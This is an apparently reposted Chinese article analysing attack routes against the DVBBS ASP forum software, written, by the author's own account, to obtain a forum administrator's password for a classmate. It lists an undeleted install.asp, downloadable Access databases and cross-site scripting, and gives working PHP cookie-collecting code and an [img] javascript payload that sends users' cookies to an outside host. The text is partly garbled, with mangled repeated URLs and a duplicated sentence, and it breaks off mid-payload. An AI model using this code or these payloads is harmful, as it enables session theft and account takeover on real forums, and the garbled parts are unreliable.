对动网先锋asp论坛的安全性分析

2013 年 8 月 9 日3830

  对动网先锋asp论坛的安全性分析

  byshocker

  http://http://www.zjjv.com// target=_blank>http://http://www.zjjv.com//">http://http://www.zjjv.com//

  http://http://www.zjjv.com// target=_blank>http://http://www.zjjv.com//">http://http://www.zjjv.com//

  近段时间比较忙,所以没时间研究些新的东西,只是由于同学要求搞一个动网论坛的管理员密码,所以对动网先锋论坛进行了一个安全性的测试

  1.安装文件未删除的问题

  =版权所有软件下载学院版权所有=

  这个问题可以说是老声常谈了,早些时候就有个什么***黑客大联盟的论坛被这么黑掉。动网论坛的安装文件名为install.asp,这个想来凡是用过的人都知道,如果你在安装论坛完成后不删除该文件,那么攻击者就能通过该文件重置你的论坛配置,打倒攻击的目的。这个问题不是动网论坛,是由于用户使用不当所致,再次提出为了引起大家注意。

  2.数据库问题

  我们都知道,asp论坛大多数都是使用access数据库,因为个人用户弄不到sqlserver的服务器,所以只能用access数据库,这就使攻击者在得到数据库路径和文件名的情况下对论坛数据库进行下载,下载后只需要用access打开即可看到论坛的所有信息,包括所有用户密码。由于这个原因,所以建议大家一定要将论坛的access文件改成一个没有规律的名字,如3sdal9eklz9c0ad.mdb.像不像是md5加密过,呵呵,不开玩笑,这样才可以避免被人下载:)

  3.上传头像功能的安全隐患=版权所有软件下载学院版权所有=

  这个问题的原因是由于微软的ie漏洞引起的,详细的原因可以参看crazybird的那篇漏洞说明。对于攻击,当然是跨站脚本攻击,如果你不知道什么是跨站脚本攻击,那么看看跨站脚本攻击详解这篇文章!攻击方法就是像我大哥analysist的那篇一种全新的跨站脚本攻击方法所说的那样,首先新建一个文本文件,如shocker.txt,内容如下:

  其中你要把shocker.soage.com改成你自己的网址,并且css.php是你收集cookie的程序,我的程序代码如下:

  ------codebegin------

  #跨站脚本攻击

  #

  $info=getenv("QUERY_STRING");

  if($info){

  $info=urldecode($info);//这里将收集到的cookie进行以下url解码

  $fp=fopen("chen.txt","a");//这里chen.txt你可以随便命名

  fputs($fp,"$info\n");

  fclose($fp);

  }

  header("Location:http://http://www.zjjv.com///pt";">http://http://www.zjjv.com///pt";//呵呵,转到mkill哪里,许多照片呀

  ?>

  -------codeend-------

  你也可以用cgi的收集cookie程序,很好写,这里就不多说了。如果你不知道,可以来http://http://www.zjjv.com// target=_blank>http://http://www.zjjv.com//">http://http://www.zjjv.com//

  4.图标签的问题

  就我测试,除了lb5k和phpbb的贴图标签没有问题以外,其他的论坛贴图标签都有问题,主要是正则表达式写得不好,lb5k的[img]标签转换写得就不错,如下:

  $signature=~s/\[img\]\s*(http|https|ftp):\/\/(\S?)\s*\[\/img\]//isg;

  这样才能防止攻击者提交诸如javascript:alert(documents.cookie);测试,动网的贴图标签就存在着问题,而且只要贴图标签存在的跨站脚本攻击比上传图片的跨站脚本攻击要容易得多,可以在你的签名或贴子里加入[img]javascript:window.open('http://http://www.zjjv.com///css.php?'documents.cookie);[/img]然后提交,但是提交后,发贴子测试发现,并没能起到跨站脚本攻击的作用,这是问什么呢?由于动网论坛把http://这个地方当成图片地址了,结果刚才提交的代码被分成了两段javascript:window.open('和http://http://www.zjjv.com///css.php?' target=_blank>http://http://www.zjjv.com///css.php?'">http://http://www.zjjv.com///css.php?'documents.cookie);[/img]然后提交,但是提交后,发贴子测试发现,并没能起到跨站脚本攻击的作用,这是问什么呢?由于动网论坛把http://这个地方当成图片地址了,结果刚才提交的代码被分成了两段javascript:window.open('和http://http://www.zjjv.com///css.php?'documents.cookie);,以至于我们提交的代码丧失了功能。难道就不能攻击了吗?当然不是,我们可以变换种方式提交,代码如下:

  [img]javascript:window.open('

0 0